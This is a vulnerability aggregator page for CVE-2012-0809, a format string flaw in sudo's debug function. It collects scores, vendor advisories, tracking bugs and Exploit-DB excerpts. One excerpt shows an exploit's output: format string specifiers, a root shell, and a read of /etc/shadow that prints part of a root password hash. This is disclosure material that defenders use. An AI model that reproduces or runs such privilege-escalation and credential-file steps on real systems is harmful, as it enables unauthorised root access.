CVE-2012-0809
published 2012-02-01CVE-2012-0809: Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences…
PriorityP341high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
2.99%
85.9th percentile
Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences in the program name for sudo.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | sudo | < sudo 1.8.3p2-1 (bookworm) | sudo 1.8.3p2-1 (bookworm) |
| sudo_project | sudo | >= 0 < 1.8.3p2-1 | 1.8.3p2-1 |
| sudo_project | sudo | >= 0 < 1.8.3p2-1 | 1.8.3p2-1 |
| sudo_project | sudo | >= 0 < 1.8.3p2-1 | 1.8.3p2-1 |
| sudo_project | sudo | >= 0 < 1.8.3p2-1 | 1.8.3p2-1 |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
| todd_miller | sudo | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
sudo: format string flaw in sudo_debug()
vendor_redhat·2012-01-30·CVSS 7.2
CVE-2012-0809 [HIGH] CWE-134 sudo: format string flaw in sudo_debug()
sudo: format string flaw in sudo_debug()
Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences in the program name for sudo.
Statement: Not vulnerable. This issue did not affect the versions of sudo as shipped with Red Hat Enterprise Linux 4, 5, or 6 as they did not include the vulnerable debugging support.
Package: sudo (Red Hat Enterprise Linux 4) - Not affected
Package: sudo (Red Hat Enterprise Linux 5) - Not affected
Package: sudo (Red Hat Enterprise Linux 6) - Not affected
Debian
CVE-2012-0809: sudo - Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8...
vendor_debian·2012·CVSS 7.2
CVE-2012-0809 [HIGH] CVE-2012-0809: sudo - Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8...
Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences in the program name for sudo.
Scope: local
bookworm: resolved (fixed in 1.8.3p2-1)
bullseye: resolved (fixed in 1.8.3p2-1)
forky: resolved (fixed in 1.8.3p2-1)
sid: resolved (fixed in 1.8.3p2-1)
trixie: resolved (fixed in 1.8.3p2-1)
GHSA
GHSA-6785-8cf2-mmj4: Format string vulnerability in the sudo_debug function in Sudo 1
ghsa_unreviewed·2022-05-14
CVE-2012-0809 [HIGH] CWE-134 GHSA-6785-8cf2-mmj4: Format string vulnerability in the sudo_debug function in Sudo 1
Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences in the program name for sudo.
OSV
CVE-2012-0809: Format string vulnerability in the sudo_debug function in Sudo 1
osv·2012-02-01·CVSS 7.2
CVE-2012-0809 [HIGH] CVE-2012-0809: Format string vulnerability in the sudo_debug function in Sudo 1
Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences in the program name for sudo.
No detection rules found.
Exploit-DB
sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation
exploitdb·2013-05-01·CVSS 7.2
CVE-2012-0809 [HIGH] sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation
sudo 1.8.0
A�AF@ F@ F@ F@ F@ ' from LD_PRELOAD cannot be preloaded: ignored.
%1073825311%21372736 %: settings:
=
%1073825311%21372736 %: settings:
=
%1073825311%21372736 %: sudo_mode 1081383169
Sorry, try again.
Sorry, try again.
Sorry, try again.
%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts
%1073886251%21372736 %: policy plugin returns 1081402445
[+] Getting root..!
[+] Cleaning system.
[+] Launching root shell!
sh-4.2# id; uname -a
uid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Linux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux
sh-4.2# head -n1 /etc/shadow
root:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2
Exploit-DB
sudo 1.8.0 < 1.8.3p1 - Format String
exploitdb·2012-01-31
CVE-2012-0809 sudo 1.8.0 < 1.8.3p1 - Format String
sudo 1.8.0
[ Authors ]
joernchen
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
sudo 1.8.0 - 1.8.3p1 (http://sudo.ws)
[ Vendor communication ]
2012-01-24 Send vulnerability details to sudo maintainer
2012-01-24 Maintainer is embarrased
2012-01-27 Asking maintainer how the fixing goes
2012-01-27 Maintainer responds with a patch and a release date
of 2012-01-30 for the patched sudo and advisory
2012-01-30 Release of this advisory
[ Description ]
Observe src/sudo.c:
void
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
char *fmt2;
if (level > debug_level)
return;
/* Backet fmt with program name and a newline to make it a single
write */
easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
va_start(ap, fmt);
vfprintf(stderr, fmt2, ap);
va_end(ap);
efree(fmt2);
}
Bugzilla
CVE-2012-0809 sudo: format string flaw in sudo_debug() [fedora-16]
bugzilla·2012-01-30·CVSS 7.2
CVE-2012-0809 [HIGH] CVE-2012-0809 sudo: format string flaw in sudo_debug() [fedora-16]
CVE-2012-0809 sudo: format string flaw in sudo_debug() [fedora-16]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=784
Bugzilla
CVE-2012-0809 sudo: format string flaw in sudo_debug()
bugzilla·2012-01-24·CVSS 7.2
CVE-2012-0809 [HIGH] CVE-2012-0809 sudo: format string flaw in sudo_debug()
CVE-2012-0809 sudo: format string flaw in sudo_debug()
A flaw was reported in the debugging code of sudo versions 1.8.0 through 1.8.3p1 which can be used to crash sudo or, possibly, allow an unauthorized user to elevate their privileges via the debugging support added in sudo 1.8.0. Due to a flaw in the sudo_debug() function, the program name (which can be controlled by the caller of sudo), is passed to fprintf() and can be exploited using standard format string exploitation techniques, allowing for the possible elevation to root privileges.
The calling user does _not_ need to be listed in the sudoers file in order to exploit this.
Acknowledgements:
Red Hat would like to thank Todd C. Miller for reporting this issue. Upstream acknowledges joernchen of Phenoelit as the original reporte
arXiv
SoK: Sanitizing for Security
arxiv_fulltext·2018-06-12
SoK: Sanitizing for Security
SoK: Sanitizing for Security
Dokyung Song,
Julian Lettner,
Prabhu Rajasekaran,
Yeoul Na,
Stijn Volckaert,
Per Larsen,
Michael Franz
University of California, Irvine
\dokyungs,jlettner,rajasekp,yeouln,stijnv,perl,franz\@uci.edu
2018 IEEE. Personal use of this material is
permitted. Permission from IEEE must be obtained for all other uses, in any
current or future media, including reprinting/republishing this material for
advertising or promotional purposes, creating new collective works, for resale
or redistribution to servers or lists, or reuse of any copyrighted component
of this work in other works.
## Abstract
The C and ++ programming languages are notoriously insecure yet remain
indispensable. Developers therefore resort to a multi-pronged approach to find
security issues before
http://archives.neohapsis.com/archives/fulldisclosure/2012-01/0591.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2012-01/att-0591/advisory_sudo.txthttp://security.gentoo.org/glsa/glsa-201203-06.xmlhttp://www.sudo.ws/sudo/alerts/sudo_debug.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2012-01/0591.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2012-01/att-0591/advisory_sudo.txthttp://security.gentoo.org/glsa/glsa-201203-06.xmlhttp://www.sudo.ws/sudo/alerts/sudo_debug.html
2012-02-01
Published